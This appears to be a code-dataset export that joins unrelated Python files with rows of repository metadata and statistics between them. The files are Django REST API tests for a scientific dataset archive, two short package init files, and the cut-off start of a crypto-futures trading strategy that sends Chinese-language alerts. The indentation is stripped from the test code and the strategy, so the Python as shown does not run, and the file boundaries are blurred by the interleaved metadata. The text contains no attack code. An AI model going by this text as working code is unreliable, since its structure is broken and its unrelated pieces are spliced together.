self.assertContains(response, 'http://testserver/api/v1/datasets/1/archive/',
status_code=status.HTTP_200_OK)
response = self.client.get('/api/v1/datasets/1/archive/')
self.assertContains(response, '')
self.assertTrue("Content-length" in response)
self.assertEqual(response["Content-length"], '17609')
self.assertTrue("Content-Disposition" in response)
self.assertTrue("attachment; filename=valid_upload_" in response['Content-Disposition'])
response = self.client.put('/api/v1/datasets/1/',
data='{"data_set_id":"FooBarBaz","description":"A FooBarBaz DataSet",'
'"name": "Data Set 1", '
'"status_comment": "",'
'"doi": "",'
'"start_date": "2016-10-28",'
'"end_date": null,'
'"qaqc_status": null,'
'"qaqc_method_description": "",'
'"ngee_tropics_resources": true,'
'"funding_organizations": "The funding organizations for my dataset",'
'"doe_funding_contract_numbers": "",'
'"acknowledgement": "",'
'"reference": "",'
'"additional_reference_information": "",'
'"originating_institution": "Lawrence Berkeley National Lab",'
'"additional_access_information": "",'
'"submission_date": "2016-10-28T19:12:35Z",'
'"contact": "http://testserver/api/v1/people/4/",'
'"authors": ["http://testserver/api/v1/people/1/"],'
'"sites": ["http://testserver/api/v1/sites/1/"],'
'"plots": ["http://testserver/api/v1/plots/1/"],'
'"variables": ["http://testserver/api/v1/variables/1/", '
'"http://testserver/api/v1/variables/2/"]}',
content_type='application/json')
self.assertEqual(status.HTTP_200_OK, response.status_code)
#########################################################################
# NGT User may SUBMIT a dataset in DRAFT mode if they own it
outbox_len = len(mail.outbox)
response = self.client.get("/api/v1/datasets/1/submit/") # In draft mode, owned by auser
value = json.loads(response.content.decode('utf-8'))
self.assertEqual(status.HTTP_200_OK, response.status_code)
self.assertEqual({'detail': 'DataSet has been submitted.', 'success': True}, value)
self.assertEqual(outbox_len + 1, len(mail.outbox)) # notification emails sent
email = mail.outbox[0]
self.assertEqual(email.subject, "[ngt-archive-test] Dataset Submitted (NGT0000)")
self.assertTrue(email.body.find("""The dataset NGT0000:Data Set 1 created on 10/28/2016 was submitted to the NGEE Tropics Archive.
You will not be able to view this dataset until it has been approved.
""") > 0)
self.assertEqual(email.to, ['myuser@foo.bar'])
response = self.client.get("/api/v1/datasets/1/")
self.assertContains(response, '"version":"1.0"')
response = self.client.get('/api/v1/datasets/1/archive/')
self.assertContains(response, '')
self.assertTrue("Content-length" in response)
self.assertEqual(response["Content-length"], '17609')
self.assertTrue("Content-Disposition" in response)
self.assertTrue("attachment; filename=valid_upload_" in response['Content-Disposition'])
shutil.rmtree(os.path.join(settings.ARCHIVE_API['DATASET_ARCHIVE_ROOT'], "0000"))
def test_upload_not_found(self):
"""
Test Dataset Archive Upload
:return:
"""
self.login_user("auser") # auser does not own Dataset 3
with open('{}/valid_upload.txt'.format(dirname(__file__)), 'r') as fp:
response = self.client.post('/api/v1/datasets/3/upload/', {'attachment': fp})
self.assertContains(response, '"detail":"Not found."',
status_code=status.HTTP_404_NOT_FOUND)
response = self.client.get('/api/v1/datasets/3/')
self.assertNotContains(response, 'http://testserver/api/v1/datasets/3/archive/',
status_code=status.HTTP_404_NOT_FOUND)
response = self.client.get('http://testserver/api/v1/datasets/3/archive/')
self.assertEqual(status.HTTP_404_NOT_FOUND, response.status_code)
def test_upload_permission_denied(self):
"""
Test Dataset Archive Upload
:return:
"""
self.login_user("auser") # auser does not own Dataset 3
with open('{}/valid_upload.txt'.format(dirname(__file__)), 'r') as fp:
response = self.client.post('/api/v1/datasets/2/upload/', {'attachment': fp})
self.assertContains(response, '"detail":"You do not have permission to perform this action."',
status_code=status.HTTP_403_FORBIDDEN)
response = self.client.get('/api/v1/datasets/2/')
self.assertNotContains(response, 'http://testserver/api/v1/datasets/2/archive/',
status_code=status.HTTP_200_OK)
response = self.client.get('http://testserver/api/v1/datasets/2/archive/')
self.assertEqual(status.HTTP_404_NOT_FOUND, response.status_code)
def test_upload_anyfile(self):
"""
Test Dataset Archive Upload
:return:
"""
self.login_user("admin")
with open('{}/valid_upload.txt'.format(dirname(__file__)), 'r') as fp:
response = self.client.post('/api/v1/datasets/1/upload/', {'attachment': fp})
self.assertContains(response, '"success":true',
status_code=status.HTTP_201_CREATED)
self.assertContains(response, 'File uploaded',
status_code=status.HTTP_201_CREATED)
response = self.client.get('/api/v1/datasets/1/')
self.assertContains(response, 'http://testserver/api/v1/datasets/1/archive/',
status_code=status.HTTP_200_OK)
response = self.client.get('http://testserver/api/v1/datasets/1/archive/')
self.assertEqual(status.HTTP_200_OK, response.status_code)
def test_issue_118(self):
"""Error when trying to submit a dataset with ngee_tropics_resources set to false #118"""
self.login_user("auser")
response = self.client.put('/api/v1/datasets/1/',
data='{"data_set_id":"FooBarBaz","description":"A FooBarBaz DataSet",'
'"name": "Data Set 1", '
'"status_comment": "",'
'"doi": "",'
'"start_date": "2016-10-28",'
'"end_date": null,'
'"qaqc_status": null,'
'"qaqc_method_description": "",'
'"ngee_tropics_resources": false,'
'"funding_organizations": "The funding organizations for my dataset",'
'"doe_funding_contract_numbers": "",'
'"acknowledgement": "",'
'"reference": "",'
'"additional_reference_information": "",'
'"originating_institution": "Lawrence Berkeley National Lab",'
'"additional_access_information": "",'
'"submission_date": "2016-10-28T19:12:35Z",'
'"contact": "http://testserver/api/v1/people/4/",'
'"authors": ["http://testserver/api/v1/people/1/"],'
'"sites": ["http://testserver/api/v1/sites/1/"],'
'"plots": ["http://testserver/api/v1/plots/1/"],'
'"variables": ["http://testserver/api/v1/variables/1/", '
'"http://testserver/api/v1/variables/2/"]}',
content_type='application/json')
self.assertEqual(status.HTTP_200_OK, response.status_code)
# Make sure the file is uploaded before submitting
with open('{}/Archive.zip'.format(dirname(__file__)), 'rb') as fp:
response = self.client.post('/api/v1/datasets/1/upload/', {'attachment': fp})
self.assertContains(response, '"success":true',
status_code=status.HTTP_201_CREATED)
#########################################################################
# NGT User may SUBMIT a dataset in DRAFT mode if they own it
response = self.client.get("/api/v1/datasets/1/submit/") # In draft mode, owned by auser
value = json.loads(response.content.decode('utf-8'))
self.assertEqual(status.HTTP_200_OK, response.status_code)
self.assertEqual({'detail': 'DataSet has been submitted.', 'success': True}, value)
# Test unsubmit workflow
self.login_user("admin")
#########################################################################
# Admin may unsubmit the dataset, putting it back into DRAFT mode
response = self.client.get("/api/v1/datasets/1/unsubmit/") # Now in submitted mode, owned by auser
value = json.loads(response.content.decode('utf-8'))
self.assertEqual(status.HTTP_200_OK, response.status_code)
self.assertEqual({'detail': 'DataSet has been unsubmitted.', 'success': True}, value)
self.login_user("auser")
#########################################################################
# NGT User may SUBMIT the dataset again once it is back in DRAFT mode
response = self.client.get("/api/v1/datasets/1/submit/") # In draft mode, owned by auser
value = json.loads(response.content.decode('utf-8'))
self.assertEqual(status.HTTP_200_OK, response.status_code)
self.assertEqual({'detail': 'DataSet has been submitted.', 'success': True}, value)
def test_issue_187(self):
"REST API: submit check that plot matches a site #187"
self.login_user("auser")
response = self.client.post('/api/v1/datasets/',
data='{"name":"A FooBarBaz DataSet",'
'"authors":["http://testserver/api/v1/people/2/"],'
'"plots":["http://testserver/api/v1/plots/1/"],'
'"variables":["http://testserver/api/v1/variables/1/"] }',
content_type='application/json')
self.assertEqual(status.HTTP_400_BAD_REQUEST,response.status_code)
self.assertEqual(json.loads(response.content.decode('utf-8')),
{"plots": ["A site must be selected."]})
response = self.client.post('/api/v1/datasets/',
data='{"name":"A FooBarBaz DataSet",'
'"authors":["http://testserver/api/v1/people/2/"],'
'"sites":["http://testserver/api/v1/sites/2/"],'
'"plots":["http://testserver/api/v1/plots/1/"],'
'"variables":["http://testserver/api/v1/variables/1/"] }',
content_type='application/json')
self.assertEqual(status.HTTP_400_BAD_REQUEST, response.status_code)
self.assertEqual(json.loads(response.content.decode('utf-8')),
{'plots': ['Select the site corresponding to plot CC-CCPD1:Central City '
'CCPD Plot 1']})
def test_issue_173(self):
"""DataSet.name should not be unique #173"""
self.login_user("auser")
response = self.client.post('/api/v1/datasets/',
data='{"name":"A FooBarBaz DataSet",'
'"authors":["http://testserver/api/v1/people/2/"],'
'"sites":["http://testserver/api/v1/sites/1/"] ,'
'"plots":["http://testserver/api/v1/plots/1/"],'
'"variables":["http://testserver/api/v1/variables/1/"] }',
content_type='application/json')
self.assertEqual(status.HTTP_201_CREATED, response.status_code)
response = self.client.post('/api/v1/datasets/',
data='{"name":"A FooBarBaz DataSet",'
'"authors":["http://testserver/api/v1/people/2/"],'
'"sites":["http://testserver/api/v1/sites/1/"] ,'
'"plots":["http://testserver/api/v1/plots/1/"],'
'"variables":["http://testserver/api/v1/variables/1/"] }',
content_type='application/json')
self.assertEqual(status.HTTP_201_CREATED, response.status_code)
def test_issue_74(self):
self.login_user("auser")
response = self.client.post('/api/v1/datasets/',
data='{"description":"A FooBarBaz DataSet",'
'"authors":["http://testserver/api/v1/people/2/"],'
'"sites":["http://testserver/api/v1/sites/1/"] ,'
'"plots":["http://testserver/api/v1/plots/1/"],'
'"variables":["http://testserver/api/v1/variables/1/"] }',
content_type='application/json')
self.assertEqual(status.HTTP_201_CREATED, response.status_code)
dataset_url = json.loads(response.content.decode('utf-8'))["url"]
response = self.client.get(dataset_url)
self.assertContains(response,
"http://testserver/api/v1/variables/1/")
self.assertContains(response,
"http://testserver/api/v1/sites/1/")
self.assertContains(response,
"http://testserver/api/v1/plots/1/")
def test_issue_180(self):
"""
Dataset lost due to permissions error
:return:
"""
self.login_user("auser")
response = self.client.post('/api/v1/datasets/',
data='{"description":"A FooBarBaz DataSet",'
'"authors":["http://testserver/api/v1/people/2/"],'
'"sites":["http://testserver/api/v1/sites/1/"] ,'
'"plots":["http://testserver/api/v1/plots/1/"],'
'"variables":["http://testserver/api/v1/variables/1/"],'
'"access_level":1 }',
content_type='application/json')
self.assertEqual(status.HTTP_201_CREATED, response.status_code)
dataset_url = json.loads(response.content.decode('utf-8'))["url"]
response = self.client.get(dataset_url)
self.assertContains(response,
"http://testserver/api/v1/variables/1/")
self.assertContains(response,
"http://testserver/api/v1/sites/1/")
self.assertContains(response,
"http://testserver/api/v1/plots/1/")
@mock.patch('django.core.files.uploadedfile.InMemoryUploadedFile.size', new_callable=PropertyMock)
def test_issue_117(self, mock_file_size):
"""Is the backend enforcing a file size limit? Testing limits for admin and regular users"""
mock_file_size.return_value = 2147483648
self.login_user("auser")
with open('{}/Archive.zip'.format(dirname(__file__)), 'rb') as fp:
response = self.client.post('/api/v1/datasets/1/upload/', {'attachment': fp})
self.assertContains(response, '"success":false',
status_code=status.HTTP_400_BAD_REQUEST)
self.assertContains(response,"Uploaded file size is 2048.0 MB. Max upload size is 1024.0 MB",
status_code=status.HTTP_400_BAD_REQUEST)
mock_file_size.return_value = 3147483648
self.login_user("admin")
with open('{}/Archive.zip'.format(dirname(__file__)), 'rb') as fp:
response = self.client.post('/api/v1/datasets/1/upload/', {'attachment': fp})
self.assertContains(response, '"success":false',
status_code=status.HTTP_400_BAD_REQUEST)
self.assertContains(response, "Uploaded file size is 3001.7 MB. Max upload size is 2048.0 MB",
status_code=status.HTTP_400_BAD_REQUEST)
def test_issue_253(self):
"""Error uploading files > 2.5 MB #253"""
self.login_user("auser")
# Write a 3 MB file
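# (Seeking to byte 3*1024*1024 - 1 and writing a single byte makes the OS
# extend the file to exactly 3 MiB without buffering 3 MB in memory.)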
with open('{}/bigfile.dat'.format(dirname(__file__)), 'wb') as out:
out.seek((1024 * 1024 * 3) - 1)
out.write(b"0")
with open('{}/bigfile.dat'.format(dirname(__file__)), 'rb') as fp:
response = self.client.post('/api/v1/datasets/1/upload/', {'attachment': fp})
self.assertContains(response, '"success":true',
status_code=status.HTTP_201_CREATED)
self.assertContains(response, "uploaded",
status_code=status.HTTP_201_CREATED)
response = self.client.get( '/api/v1/datasets/1/archive/')
self.assertContains(response, '')
self.assertTrue("Content-length" in response)
self.assertEqual(response["Content-length"], '3145728')
self.assertTrue("Content-Disposition" in response)
self.assertTrue("attachment; filename=bigfile_" in
response['Content-Disposition'])
try:
os.remove('{}/bigfile.dat'.format(dirname(__file__)))
except OSError:
pass
class SiteClientTestCase(APITestCase):
fixtures = ('test_auth.json', 'test_archive_api.json',)
def login_user(self, username):
user = User.objects.get(username=username)
self.client.force_login(user)
def setUp(self):
self.client = Client()
user = User.objects.get(username="auser")
self.client.force_login(user)
def test_client_list(self):
# Unauthorized user that is not in any groups
self.login_user("vibe")
response = self.client.get('/api/v1/sites/')
self.assertEqual(status.HTTP_403_FORBIDDEN, response.status_code)
self.login_user("auser")
response = self.client.get('/api/v1/sites/')
self.assertEqual(status.HTTP_200_OK, response.status_code)
def test_client_get(self):
# Unauthorized user that is not in any groups
self.login_user("vibe")
response = self.client.get('/api/v1/sites/1/')
self.assertEqual(status.HTTP_403_FORBIDDEN, response.status_code)
self.login_user("auser")
response = self.client.get('/api/v1/sites/1/')
self.assertEqual(json.loads(response.content.decode('utf-8')),
{"url": "http://testserver/api/v1/sites/1/", "site_id": "CC-CCPD",
"name": "Central City CCPD",
"description": "Et doming epicurei posidonium has, an sit sanctus intellegebat. Ne malis reprehendunt mea. Iisque dolorem vel cu. Ut nam sapientem appellantur definitiones, copiosae placerat inimicus per ei. Cu pro reque putant, cu perfecto urbanitas posidonium eum, pri probo laoreet cu. Ei duo cetero concludaturque, ei adhuc facilis sit.\r\n\r\nAn aeque harum ius, mea ut erant verear salutandi. Eligendi recusabo usu ad. Ad modo vero consequat his, ne aperiam alienum suscipiantur his. Altera laoreet petentium pro ut. His option vocibus at. Vix no semper omnesque maluisset, accusata qualisque ut pro. Eos sint constituto temporibus in.",
"country": "United States", "state_province": "", "utc_offset": -9,
"location_latitude": -8.983987234, "location_longitude": 5.9832932847,
"location_elevation": "100-400", "location_map_url": "",
"location_bounding_box_ul_latitude": None,
"location_bounding_box_ul_longitude": None, "location_bounding_box_lr_latitude": None,
"location_bounding_box_lr_longitude": None, "site_urls": "http://centralcityccpd.baz",
"submission_date": "2016-10-01", "contacts": [], "pis": [],
"submission": "http://testserver/api/v1/people/3/"})
self.assertEqual(status.HTTP_200_OK, response.status_code)
def test_client_post(self):
response = self.client.post('/api/v1/sites/',
data='{"data_set_id":"FooBarBaz","description":"A FooBarBaz DataSet"}',
content_type='application/json')
self.assertEqual(status.HTTP_403_FORBIDDEN, response.status_code)
def test_client_put(self):
response = self.client.put('/api/v1/sites/2/',
data='{"data_set_id":"FooBarBaz","description":"A FooBarBaz DataSet"}',
content_type='application/json')
self.assertEqual(status.HTTP_403_FORBIDDEN, response.status_code)
class PlotClientTestCase(APITestCase):
fixtures = ('test_auth.json', 'test_archive_api.json',)
def login_user(self, username):
user = User.objects.get(username=username)
self.client.force_login(user)
def setUp(self):
self.client = Client()
self.login_user("auser")
def test_client_list(self):
# Unauthorized user that is not in any groups
self.login_user("vibe")
response = self.client.get('/api/v1/plots/')
self.assertEqual(status.HTTP_403_FORBIDDEN, response.status_code)
self.login_user("auser")
response = self.client.get('/api/v1/plots/')
self.assertEqual(status.HTTP_200_OK, response.status_code)
def test_client_get(self):
# Unauthorized user that is not in any groups
self.login_user("vibe")
response = self.client.get('/api/v1/sites/1/')
self.assertEqual(status.HTTP_403_FORBIDDEN, response.status_code)
self.login_user("auser")
response = self.client.get('/api/v1/plots/1/')
self.assertEqual(json.loads(response.content.decode('utf-8')),
{"url": "http://testserver/api/v1/plots/1/", "plot_id": "CC-CCPD1",
"name": "Central City CCPD Plot 1",
"description": "Sed ut perspiciatis, unde omnis iste natus error sit voluptatem accusantium doloremque laudantium, totam rem aperiam eaque ipsa, quae ab illo inventore veritatis et quasi architecto beatae vitae dicta sunt, explicabo. Nemo enim ipsam voluptatem, quia voluptas sit, aspernatur aut odit aut fugit, sed quia consequuntur magni dolores eos, qui ratione voluptatem sequi nesciunt, neque porro quisquam est, qui dolorem ipsum, quia dolor sit amet, consectetur, adipisci[ng] velit, sed quia non numquam [do] eius modi tempora inci[di]dunt, ut labore et dolore magnam aliquam quaerat voluptatem. Ut enim ad minima veniam, quis nostrum exercitationem ullam corporis suscipit laboriosam, nisi ut aliquid ex ea commodi consequatur? Quis autem vel eum iure reprehenderit, qui in ea voluptate velit esse, quam nihil molestiae consequatur, vel illum, qui dolorem eum fugiat, quo voluptas nulla pariatur",
"size": "", "location_elevation": "", "location_kmz_url": "", "submission_date": "2016-10-08",
"pi": "http://testserver/api/v1/people/3/",
"site": "http://testserver/api/v1/sites/1/",
"submission": "http://testserver/api/v1/people/4/"})
self.assertEqual(status.HTTP_200_OK, response.status_code)
def test_client_post(self):
response = self.client.post('/api/v1/plots/',
data='{"data_set_id":"FooBarBaz","description":"A FooBarBaz DataSet"}',
content_type='application/json')
self.assertEqual(status.HTTP_403_FORBIDDEN, response.status_code)
def test_client_put(self):
response = self.client.put('/api/v1/plots/1/',
data='{"data_set_id":"FooBarBaz","description":"A FooBarBaz DataSet"}',
content_type='application/json')
self.assertEqual(status.HTTP_403_FORBIDDEN, response.status_code)
class ContactClientTestCase(APITestCase):
fixtures = ('test_auth.json', 'test_archive_api.json',)
def login_user(self, username):
user = User.objects.get(username=username)
self.client.force_login(user)
def setUp(self):
self.client = Client()
self.login_user("auser")
def test_client_list(self):
# Unauthorized user that is not in any groups
self.login_user("vibe")
response = self.client.get('/api/v1/people/')
self.assertEqual(status.HTTP_403_FORBIDDEN, response.status_code)
self.login_user("auser")
response = self.client.get('/api/v1/people/?format=api')
self.assertEqual(status.HTTP_200_OK, response.status_code)
def test_client_get(self):
# Unauthorized user that is not in any groups
self.login_user("vibe")
response = self.client.get('/api/v1/people/2/')
self.assertEqual(status.HTTP_403_FORBIDDEN, response.status_code)
self.login_user("auser")
response = self.client.get('/api/v1/people/2/')
self.assertEqual(json.loads(response.content.decode('utf-8')),
{"url": "http://testserver/api/v1/people/2/", "first_name": "Luke",
"last_name": "Cage", "email": "lcage@foobar.baz", "institution_affiliation": "POWER", "orcid": ""})
self.assertEqual(status.HTTP_200_OK, response.status_code)
def test_client_post(self):
response = self.client.post('/api/v1/people/',
data='{"first_name":"Killer","last_name":"Frost","email":"kfrost@earth2.baz","institution_affiliation":"ZOOM"}',
content_type='application/json')
self.assertEqual(json.loads(response.content.decode('utf-8')),
{"url": "http://testserver/api/v1/people/7/", "first_name": "Killer", "last_name": "Frost",
"email": "kfrost@earth2.baz", "institution_affiliation": "ZOOM", "orcid": ""})
self.assertEqual(status.HTTP_201_CREATED, response.status_code)
def test_client_put(self):
response = self.client.put('/api/v1/people/2/',
data='{"url": "http://testserver/api/v1/people/2/", "first_name": "Luke", "last_name": "Cage", "email": "lcage@foobar.baz", "institution_affiliation": "POW"}',
content_type='application/json')
self.assertEqual(status.HTTP_403_FORBIDDEN, response.status_code)
class VariableClientTestCase(APITestCase):
fixtures = ('test_auth.json', 'test_archive_api.json',)
def login_user(self, username):
user = User.objects.get(username=username)
self.client.force_login(user)
def setUp(self):
self.client = Client()
user = User.objects.get(username="auser")
self.client.force_login(user)
def test_client_list(self):
# Unauthorized user that is not in any groups
self.login_user("vibe")
response = self.client.get('/api/v1/variables/')
self.assertEqual(status.HTTP_403_FORBIDDEN, response.status_code)
self.login_user("auser")
response = self.client.get('/api/v1/variables/')
self.assertEqual(status.HTTP_200_OK, response.status_code)
def test_client_get(self):
# Unauthorized user that is not in any groups
self.login_user("vibe")
response = self.client.get('/api/v1/variables/2/')
self.assertEqual(status.HTTP_403_FORBIDDEN, response.status_code)
self.login_user("auser")
response = self.client.get('/api/v1/variables/2/')
self.assertEqual(json.loads(response.content.decode('utf-8')),
{"url": "http://testserver/api/v1/variables/2/", "name": "Ice"})
self.assertEqual(status.HTTP_200_OK, response.status_code)
def test_client_post(self):
response = self.client.post('/api/v1/variables/',
data='{"name":"Val}',
content_type='application/json')
self.assertEqual(status.HTTP_403_FORBIDDEN, response.status_code)
def test_client_put(self):
response = self.client.put('/api/v1/variables/2/',
data='", "{"name":"Val}"}',
content_type='application/json')
self.assertEqual(status.HTTP_403_FORBIDDEN, response.status_code)
| 55.769754 | 932 | 0.554059 | 6,824 | 65,641 | 5.201348 | 0.088658 | 0.029442 | 0.05832 | 0.054601 | 0.814166 | 0.789063 | 0.763284 | 0.741618 | 0.727531 | 0.710092 | 0 | 0.025511 | 0.288174 | 65,641 | 1,176 | 933 | 55.817177 | 0.734125 | 0.063101 | 0 | 0.703789 | 0 | 0.009185 | 0.319049 | 0.066217 | 0 | 0 | 0 | 0 | 0.291619 | 1 | 0.06085 | false | 0.001148 | 0.019518 | 0.001148 | 0.096441 | 0.001148 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
| 0cedfacc5254e74a4ed12c03e80b96a0c1ac5f96 | 118 | py | Python | littlebird/__init__.py | aryamccarthy/littlebird | 7f2b622a6669f53dbec836862c9dd0de59046359 | ["MIT"] | null | null | null | littlebird/__init__.py | aryamccarthy/littlebird | 7f2b622a6669f53dbec836862c9dd0de59046359 | ["MIT"] | null | null | null | littlebird/__init__.py | aryamccarthy/littlebird | 7f2b622a6669f53dbec836862c9dd0de59046359 | ["MIT"] | null | null | null |
from .tweet_utils import TweetReader
from .tweet_utils import TweetWriter
from .tweet_tokenizer import TweetTokenizer
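# A minimal sketch (an assumption, not in the original file): an explicit
# __all__ would pin down the re-exported names so `from littlebird import *`
# only exposes the three public classes.
# __all__ = ["TweetReader", "TweetWriter", "TweetTokenizer"]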
| 29.5 | 43 | 0.872881 | 15 | 118 | 6.666667 | 0.533333 | 0.27 | 0.28 | 0.4 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.101695 | 118 | 3 | 44 | 39.333333 | 0.943396 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
| 0b76365a67b37869a488d54b19cb3e82aafb5122 | 74 | py | Python | sample-apps/imports-app/src/routes/__init__.py | fakepop/hubspot-api-python | f04103a09f93f5c26c99991b25fa76801074f3d3 | ["Apache-2.0"] | 1 | 2020-11-12T08:46:32.000Z | 2020-11-12T08:46:32.000Z | sample-apps/imports-app/src/routes/__init__.py | fakepop/hubspot-api-python | f04103a09f93f5c26c99991b25fa76801074f3d3 | ["Apache-2.0"] | null | null | null | sample-apps/imports-app/src/routes/__init__.py | fakepop/hubspot-api-python | f04103a09f93f5c26c99991b25fa76801074f3d3 | ["Apache-2.0"] | null | null | null |
from .oauth import module as oauth
from .imports import module as imports
| 24.666667
| 38
| 0.810811
| 12
| 74
| 5
| 0.5
| 0.4
| 0.466667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.162162
| 74
| 2
| 39
| 37
| 0.967742
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
0ba77b63e7a1ec2bc3e9bbef7845512a760fbe06
| 32,844
|
py
|
Python
|
strategies/LineWith.py
|
mn3711698/singlecoin
|
63f0154ba17c7a21295b2ff6ef94929cf708a47c
|
[
"MIT"
] | 33
|
2021-05-14T03:21:53.000Z
|
2021-11-07T20:27:53.000Z
|
strategies/LineWith.py
|
mn3711698/singlecoin
|
63f0154ba17c7a21295b2ff6ef94929cf708a47c
|
[
"MIT"
] | 2
|
2021-06-04T15:31:01.000Z
|
2021-09-25T12:24:02.000Z
|
strategies/LineWith.py
|
mn3711698/singlecoin
|
63f0154ba17c7a21295b2ff6ef94929cf708a47c
|
[
"MIT"
] | 14
|
2021-05-14T03:34:30.000Z
|
2021-11-10T12:35:39.000Z
|
# -*- coding: utf-8 -*-
##############################################################################
# Author:QQ173782910
##############################################################################
from datetime import datetime
from strategies import Base
from getaway.send_msg import dingding, wx_send_msg
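# LineWith appears to be a trend-following futures strategy: on_pos_data
# reconciles local state with the exchange position and resets stop levels,
# while ticker_data opens or closes positions from the HYJ_jd_ss signal using
# fixed stop-loss/take-profit bands around the entry price.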
class LineWith(Base):
def on_pos_data(self, pos_dict):
# First check whether there is a position; if so, check whether it is long or short and set the corresponding stop-loss price.
current_pos = float(pos_dict['positionAmt'])
self.unRealizedProfit = float(pos_dict['unRealizedProfit'])
entryPrice = float(pos_dict['entryPrice'])
if self.enter_price == 0 or self.enter_price != entryPrice:
self.enter_price = entryPrice
if current_pos > 0:
self.stoploss_price = entryPrice * (1 - self.long_stoploss)
self.takeprofit_price = entryPrice * (1 + self.long_takeprofit)
elif current_pos < 0:
self.stoploss_price = entryPrice * (1 + self.short_stoploss)
self.takeprofit_price = entryPrice * (1 - self.short_takeprofit)
if self.pos != 0:
if self.unRealizedProfit > 0:
self.maxunRealizedProfit = max(self.maxunRealizedProfit, self.unRealizedProfit)
elif self.unRealizedProfit < 0:
self.lowProfit = min(self.lowProfit, self.unRealizedProfit)
if self.pos != current_pos:  # Check whether the local and exchange positions match.
if current_pos == 0:
dingding(f"仓位检查:{self.symbol},交易所帐户仓位为0,无持仓,系统仓位为:{self.pos},重置为0", symbols=self.symbol)
self.pos = 0
self.sync_data()
return
elif current_pos != 0:
if self.HYJ_jd_ss != 0:
self.HYJ_jd_ss = 0
dingding(f"仓位检查:{self.symbol},交易所帐户仓位为:{current_pos},有持仓,系统仓位为:{self.pos},重置为:{current_pos}", symbols=self.symbol)
self.pos = current_pos
self.sync_data()
return
if current_pos == 0 and len(self.open_orders) == 0:
coraup = self.cora_wave > self.old_cora_wave
Cora_Raw_wave = self.cora_raw - self.cora_wave
if coraup:  # long direction
raw_wave = abs(Cora_Raw_wave) > self.long_line_poor
else:  # short direction
raw_wave = abs(Cora_Raw_wave) > self.short_line_poor
if self.pos_flag == 1 and coraup and raw_wave:  # Long order unfilled: cancel the unfilled order and place it again
self.pos_flag = 0
self.pos = self.round_to(self.trading_size, self.min_volume)
enter_price = self.ask
res_buy = self.buy(enter_price, abs(self.pos), mark=True)
self.enter_price = enter_price
self.stoploss_price = enter_price * (1 - self.long_stoploss)
self.takeprofit_price = enter_price * (1 + self.long_takeprofit)
self.high_price = enter_price
self.low_price = enter_price
self.maxunRealizedProfit = 0
self.unRealizedProfit = 0
self.lowProfit = 0
self.pos_update_time = datetime.now()
self.sync_data()
HYJ_jd_first = f"交易对:{self.symbol},仓位:{self.pos}"
HYJ_jd_tradeType = "开多2"
HYJ_jd_curAmount = f"{enter_price}"
HYJ_jd_remark = f"最新价:{self.last_price}"
dingding(f"开多2,交易所返回:{res_buy}", symbols=self.symbol)
wx_send_msg(HYJ_jd_first, HYJ_jd_tradeType, HYJ_jd_curAmount, HYJ_jd_remark)
elif self.pos_flag == -1 and not coraup and raw_wave:  # Short order unfilled: cancel the unfilled order and place it again
self.pos_flag = 0
self.pos = self.round_to(self.trading_size, self.min_volume)
enter_price = self.bid
res_sell = self.sell(enter_price, abs(self.pos), mark=True)
self.pos = -self.pos
self.enter_price = enter_price
self.stoploss_price = enter_price * (1 + self.short_stoploss)
self.takeprofit_price = enter_price * (1 - self.short_takeprofit)
self.high_price = enter_price
self.low_price = enter_price
self.maxunRealizedProfit = 0
self.unRealizedProfit = 0
self.lowProfit = 0
self.pos_update_time = datetime.now()
self.sync_data()
HYJ_jd_first = f"交易对:{self.symbol},仓位:{self.pos}"
HYJ_jd_tradeType = "开空2"
HYJ_jd_curAmount = f"{enter_price}"
HYJ_jd_remark = f"最新价:{self.last_price}"
dingding(f"开空2,交易所返回:{res_sell}", symbols=self.symbol)
wx_send_msg(HYJ_jd_first, HYJ_jd_tradeType, HYJ_jd_curAmount, HYJ_jd_remark)
else:
self.pos_flag = 0
def on_ticker_data(self, ticker):
self.ticker_data(ticker)
def ticker_data(self, ticker):
if self.symbol == ticker['symbol']:
last_price = float(ticker['last_price'])  # Latest price.
self.last_price = last_price
if self.pos != 0:
if self.high_price > 0:
self.high_price = max(self.high_price, self.last_price)
if self.low_price > 0:
self.low_price = min(self.low_price, self.last_price)
if self.pos == 0:  # No open position
if self.HYJ_jd_ss == 1:  # The strategy computed an open-long signal
self.HYJ_jd_ss = 0
self.pos = self.round_to(self.trading_size, self.min_volume)
enter_price = self.ask
res_buy = self.buy(enter_price, abs(self.pos), mark=True)
self.enter_price = enter_price
self.stoploss_price = enter_price * (1 - self.long_stoploss)
self.takeprofit_price = enter_price * (1 + self.long_takeprofit)
self.high_price = enter_price
self.low_price = enter_price
self.maxunRealizedProfit = 0
self.unRealizedProfit = 0
self.lowProfit = 0
self.pos_update_time = datetime.now()
self.sync_data()
HYJ_jd_first = f"交易对:{self.symbol},仓位:{self.pos}"
HYJ_jd_tradeType = "开多"
HYJ_jd_curAmount = f"{enter_price}"
HYJ_jd_remark = f"最新价:{self.last_price}"
dingding(f"开多交易所返回:{res_buy}", symbols=self.symbol)
wx_send_msg(HYJ_jd_first, HYJ_jd_tradeType, HYJ_jd_curAmount, HYJ_jd_remark)
elif self.HYJ_jd_ss == -1:  # The strategy computed an open-short signal
self.HYJ_jd_ss = 0
